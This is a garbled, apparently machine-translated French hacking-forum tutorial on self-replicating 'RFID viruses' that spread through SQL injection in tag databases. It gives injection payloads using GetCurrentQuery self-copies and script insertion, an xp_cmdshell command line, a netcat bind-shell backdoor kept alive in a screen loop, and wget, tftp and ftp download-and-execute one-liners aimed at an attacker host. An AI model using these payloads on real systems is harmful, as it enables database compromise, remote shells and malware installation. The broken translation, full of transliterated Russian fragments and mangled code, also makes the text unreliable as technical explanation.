Le virus de la structure RFID piratage.


{Présentation}

En outre, cet article sur le sujet RFID-piratage. Fundamentals et le début prévu dans le premier article à: http://forum.antichat.ru/thread123511.html. Parce que nous savons que, la RFID est Radio Frequency IDentification (RFID) méthode distante de stockage et de transmission d'informations par des signaux radio à l'aide de dispositifs appelés RFID marqués.

{} A propos des parasites

Les principales fonctions du virus dans ce type d'attaque, il est lui-même et l'exécution de code arbitraire copie. A cet effet, généralement le parasite utilise la base de données. Détails dépendent de la base de données utilisée. Fondamentalement, il existe deux catégories de virus dans ce type d'attaque: le premier utilise des requêtes arbitraires à la base de données, la seconde tous les exercices en utilisant quines (programme spécial).
code arbitraire qui peut effectuer un virus dépend des mécanismes de la réponse à injection SQL base de données.


{SQL-injection}

Les systèmes d'administration de la méthode RFID-tags couramment utilisés à partir d'une requête de base de données, puis renvoient les données, qui à son tour peuvent être copiés dans le bon ordre. Donc, copier les balises elles-mêmes en présence de certains facteurs.

Actuellement, deux types de virus peuvent être considérés comme un seul programme est la première demande et le second est l'utilisation de plusieurs demandes.
Le premier type de virus, en utilisant un minimum d'espace, et sa structure peut supporter une charge de combat. Et seulement utilisé pour entrer les informations de planification déjà dans la base de données. Le virus utilise plusieurs requêtes au contraire, il a été créé pour les systèmes de l'infection autoindifikatsii et de mettre un code malveillant ou autre charge utile. La méthode la plus couramment utilisée de seconde, mais pour le bon fonctionnement de ce type de virus est nécessaire pour bien adhérer à certaines conditions dans une base de données, et de fournir cette oeuvre fonctions GetCurrentQuery de style pour l'accès. Il est nécessaire, afin d'éviter les erreurs, comme cette API vous permet d'entrer un commentaire Fitch. (Je me hâte de vous rassurer, ces caractéristiques à l'origine inclus dans le système par défaut)

attaques spécifiques peuvent être effectuées lorsque la base de données a fait une demande à l'étiquette, et elle a répondu comme ce contenu
ContainerContents UPDATE SET OldContents = '% teneur%' WHERE TagID = '% id%'

Il y aura zamnetsya contenu ultérieures et les variables id

Si cette demande sera sans erreur, alors un attaquant peut modifier la demande à sa discrétion avec nos citations préférées (de ''). Et ce qui peut être fait ??? Et cela est d'ajouter seulement du point de l'auto-copie à NewContents et infecter d'autres systèmes d'une manière similaire.

Voilà ce que nous devons:
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) – UPDATE ContainerContents SET OldContents='Apples', NewContents=SUBSTR(GetCurrentQuery (),43,57) -- WHERE TagId='123'
Plutôt que de simplement mettre à jour la région OldContents, demande maintenant met également à jour les NewContents de la région. Lors de l'utilisation des commentaires SQL (-) dans la base de données toutes les lignes sont peremescheny.Chto ouvre de nouvelles possibilités pour atakueschego.

Insertion d'un code malveillant.

Dans la technologie injecte décrit ci-dessus, il est impossible l'exécution de tout code autre que les demandes data.However base lorsque les skriptenga côté client, le serveur devient automatiquement vulnérable. Les scripts peuvent être insérés après le commentaire, de sorte que le système de base de données les a ignorés.
La seule chose à garder à l'esprit que lorsque le code exploit, il est nécessaire de prendre en compte un troisième paramètre SUBSTR qui devrait refléter réelle exploiter.
Apples', NewContents=SUBSTR(GetCurrentQuery (),43,73) --<script>...</script>
Dans une forme plus grave, en utilisant des variables et des inserts non seulement certains certains couinements il ressemblera à ceci:
Apples'; UPDATE ContainerContents SET NewContents=NewContents || ''';' || GetCurrentQuery () || ';%payload%; --';%payload% --
Ensuite, le code malveillant doit être travaillé à deux reprises, à savoir la première fois, il est lui-même la copie de la base de données, la deuxième fois est la performance elle-même.

À l'heure actuelle, la possibilité de présenter des commentaires dans Oracle (OCI / iSQL * Plus) Il fournit des fonctionnalités GetCurrentQuery style, suivi des privilèges administratora.PostgreSQL, MySQL et SQL Server également autoriser les commentaires et injecter de multiples demandes. Ici aussi, il y a une fonctionnalité GetCurrentQuery style. Cependant, PostgreSQL et SQL Server ne sont pas mis en place fiables virus de travailleurs, tous limités à une évolution du procès.


{Quelques exemples de code malveillant injecté}

les fonctions de gestion du système fournis par la base de données, peuvent être utilisés pour causer des problèmes. Exemple, Microsoft SQL Server fournit une fonction privée, qui permet à la base de données pour être fermé à partir de SQL.
Lecture des données de la base de données
UPDATE ContainerContents SET OldContents='%contents%' WHERE TagID='%id%' %' WHERE TagID = '% id%' données dans la requête suivante peuvent être utilisés pour les requêtes à la base de données directement.
'|| (SELECT ...) ||'
Dans ce cas, les guillemets effectuent des données d'injection de SQL et de force interprétés comme code. || l'opérateur effectue séquence de communication, ce qui provoque la demande PRÉFÉRÉ résultat à ajouter au champ dans la base de données. opérateur de réseau de séquence est nécessaire pour commenter nitrolizovat-à-dire nos citations préférées.


{Execution Shell-Command via SQL-inject}

SQL Server fournit la procédure xp_cmdshell qui permet malveillants et non, les commandes à exécuter.
EXEC Master..xp_cmdshell 'commands';

{Installation backdoors dans le système}

Pour le système de protroyanivaniya nous avons besoin de l'équipe sleduschte
netcat -lp1234|sh
qui sera entendu en 1234 le port.

Mais ici, nous sommes en danger, installé et correctement fairvol ou brendmaura configuré. Et voici la solution, exécutez le code dans une boucle sans fin, de sorte que cela a fonctionné comme un démon, ce qui en soi crée un plus avancé en arrière.
screen -dmS t bash -c"while [ true ]; do netcat -lp1234|sh; done {Autres caractéristiques}

Il y a encore une Fitch utile, par exemple wget.Toest télécharger le fichier sur le réseau, et le système de fichiers de stockage.
wget http://ip/myexploit -O /tmp/myexploit; chmod +x /tmp/myexploit; /tmp/myexploit
wget est généralement pas disponible sur les systèmes Windows. Dans ce cas, vous devez utiliser tftp
tftp -i ip GET myexploit.exe & myexploit
Vous pouvez créer un fichier texte mis en évidence, comme on dit à la volée, en utilisant la fonction d'écho
echo anonymous & echo BIN & echo GET myexploit.exe & echo quit) > ftp.txt & ftp -s:ftp.txt ip & myexploit {Conclusion}

Cet article décrit la pénétration dans le système affecté pour étiquettes RFID par le logiciel .tut Bien sûr, je dois vous avertir que tout le matériel contenu est présenté à titre de référence seulement. Compte tenu de la complexité de la technologie d'exécution, à savoir la création de l'étiquette elle-même et sa programmation avec une intention malveillante, me semble un chur compliqué pour un profane simple. Je préviens les gens qui savent souffrant, mais ne rien faire, il ne faut pas de vérifier cette information dans la pratique.